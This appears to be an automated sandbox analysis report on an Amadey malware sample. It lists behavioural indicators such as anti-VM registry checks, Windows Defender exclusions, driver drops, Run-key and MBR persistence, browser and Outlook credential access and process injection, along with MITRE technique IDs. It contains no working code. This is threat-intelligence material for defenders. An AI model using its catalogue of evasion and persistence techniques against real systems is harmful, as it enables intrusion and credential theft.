amadey | 2455cf14f9efe4b234215f89b672996d04d219d87a1d73aa1eb4fd497510f3e5

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	10f280b706.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	72795d1f06.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
20	3636	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1424	powershell.exe
3636	powershell.exe

Downloads MZ/PE file 13 IoCs

flow	pid	Process
313	1776	MSBuild.exe
359	1776	MSBuild.exe
307	2780	svchost.exe
30	848	rapes.exe
67	1776	MSBuild.exe
95	1776	MSBuild.exe
212	1776	MSBuild.exe
369	1776	MSBuild.exe
390	1776	MSBuild.exe
20	3636	powershell.exe
34	848	rapes.exe
157	1776	MSBuild.exe
305	1776	MSBuild.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\Drivers\9c4d2b28.sys	dfe9b371.exe
File created	C:\Windows\System32\Drivers\klupd_9c4d2b28a_arkmon.sys	dfe9b371.exe

Sets service image path in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

credential_access stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\9c4d2b28\ImagePath = "System32\\Drivers\\9c4d2b28.sys"	dfe9b371.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_9c4d2b28a_arkmon\ImagePath = "System32\\Drivers\\klupd_9c4d2b28a_arkmon.sys"	dfe9b371.exe

Uses browser remote debugging 2 TTPs 10 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
5716	msedge.exe
1416	msedge.exe
1560	chrome.exe
1100	chrome.exe
5196	chrome.exe
5708	msedge.exe
5732	msedge.exe
1756	chrome.exe
4008	chrome.exe
6044	msedge.exe

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	72795d1f06.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	10f280b706.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	72795d1f06.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	10f280b706.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Control Panel\International\Geo\Nation	rapes.exe

Deletes itself 1 IoCs

pid	Process
5520	w32tm.exe

Executes dropped EXE 36 IoCs

pid	Process
436	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
848	rapes.exe
2912	ibC8xs1.exe
1272	exp.exe
2836	DgQBvwg.exe
4616	exp.exe
1008	steamerrorreporter.exe
4420	steamerrorreporter.exe
4688	5LlBAvp.exe
5816	YSdglTu.exe
2256	YSdglTu.exe
6116	rapes.exe
4952	Pgpx359.exe
6028	e9ff9c3a5a.exe
1196	a31e3b2417.exe
5428	10f280b706.exe
6096	Pgpx359.exe
5588	YSdglTu.exe
392	YSdglTu.exe
5728	5LlBAvp.exe
4584	ibC8xs1.exe
3088	exp.exe
5556	DgQBvwg.exe
5692	exp.exe
5984	UZPt0hR.exe
6116	tzutil.exe
5520	w32tm.exe
13840	rapes.exe
14176	larBxd7.exe
6540	72795d1f06.exe
7116	9sWdA2p.exe
2732	steamerrorreporter.exe
9032	steamerrorreporter.exe
9280	65086ede.exe
5428	dfe9b371.exe
11044	AfkeY2q.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	10f280b706.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	72795d1f06.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Wine	rapes.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9c4d2b28.sys	dfe9b371.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\9c4d2b28.sys\ = "Driver"	dfe9b371.exe

Loads dropped DLL 64 IoCs

pid	Process
1008	steamerrorreporter.exe
1008	steamerrorreporter.exe
4420	steamerrorreporter.exe
4420	steamerrorreporter.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
2256	YSdglTu.exe
4084	remoteBggbv2.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
392	YSdglTu.exe
2732	steamerrorreporter.exe
2732	steamerrorreporter.exe
9032	steamerrorreporter.exe
9032	steamerrorreporter.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe
5428	dfe9b371.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	MSBuild.exe

Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\22673f59-a95e-41d9-b9a7-ef07a0444460 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{ad191732-16cd-4bbe-8b10-aeb710ea48c9}\\22673f59-a95e-41d9-b9a7-ef07a0444460.cmd\""	dfe9b371.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	ibC8xs1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	DgQBvwg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	ibC8xs1.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Shell = "explorer.exe C:\\Users\\Admin\\AppData\\Roaming\\blv20gPs\\exp.exe"	DgQBvwg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
405	raw.githubusercontent.com
406	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
151	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	72795d1f06.exe
File opened for modification	\??\PhysicalDrive0	dfe9b371.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
436	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
848	rapes.exe
6116	rapes.exe
5428	10f280b706.exe
13840	rapes.exe
6540	72795d1f06.exe

Suspicious use of SetThreadContext 27 IoCs

description	pid	Process	procid_target
PID 2912 set thread context of 1776	2912	ibC8xs1.exe	108
PID 1272 set thread context of 4248	1272	exp.exe	119
PID 1776 set thread context of 4500	1776	MSBuild.exe	124
PID 2836 set thread context of 4144	2836	DgQBvwg.exe	129
PID 1776 set thread context of 1700	1776	MSBuild.exe	132
PID 4616 set thread context of 3080	4616	exp.exe	146
PID 4688 set thread context of 3656	4688	5LlBAvp.exe	155
PID 1776 set thread context of 5924	1776	MSBuild.exe	157
PID 1776 set thread context of 5380	1776	MSBuild.exe	173
PID 1776 set thread context of 3816	1776	MSBuild.exe	178
PID 1776 set thread context of 440	1776	MSBuild.exe	182
PID 4420 set thread context of 5248	4420	steamerrorreporter.exe	180
PID 1776 set thread context of 5264	1776	MSBuild.exe	184
PID 1776 set thread context of 1732	1776	MSBuild.exe	189
PID 1776 set thread context of 2888	1776	MSBuild.exe	193
PID 1776 set thread context of 4244	1776	MSBuild.exe	196
PID 5728 set thread context of 4544	5728	5LlBAvp.exe	198
PID 4584 set thread context of 3704	4584	ibC8xs1.exe	203
PID 1776 set thread context of 1008	1776	MSBuild.exe	206
PID 3088 set thread context of 5864	3088	exp.exe	214
PID 5556 set thread context of 5528	5556	DgQBvwg.exe	218
PID 1776 set thread context of 5724	1776	MSBuild.exe	224
PID 5692 set thread context of 4920	5692	exp.exe	236
PID 1776 set thread context of 7884	1776	MSBuild.exe	244
PID 1776 set thread context of 6344	1776	MSBuild.exe	250
PID 1776 set thread context of 6824	1776	MSBuild.exe	252
PID 1776 set thread context of 8608	1776	MSBuild.exe	262

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	65086ede.exe
File opened (read-only)	\??\VBoxMiniRdrDN	dfe9b371.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\firefox.exe	MSBuild.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\Installer\e5869e0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e5869e0.msi	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6BF4.tmp	msiexec.exe
File created	C:\Windows\Installer\e5869e4.msi	msiexec.exe
File created	C:\Windows\Tasks\rapes.job	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\SourceHash{21A523FF-B931-41F7-BDB8-D9653E221476}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE96D.tmp	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000d000000023efb-625.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UZPt0hR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steamerrorreporter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steamerrorreporter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Pgpx359.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	larBxd7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9sWdA2p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e9ff9c3a5a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AfkeY2q.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Pgpx359.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steamerrorreporter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dfe9b371.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	72795d1f06.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	65086ede.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	10f280b706.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Checks processor information in registry 2 TTPs 22 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSBuild.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	MSBuild.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MSBuild.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MSBuild.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	MSBuild.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies registry class 17 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000_Classes\Local Settings	rundll32.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2304	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1776	MSBuild.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3636	powershell.exe
3636	powershell.exe
436	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
436	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
848	rapes.exe
848	rapes.exe
1272	exp.exe
1272	exp.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe
1776	MSBuild.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
5428	dfe9b371.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
4420	steamerrorreporter.exe
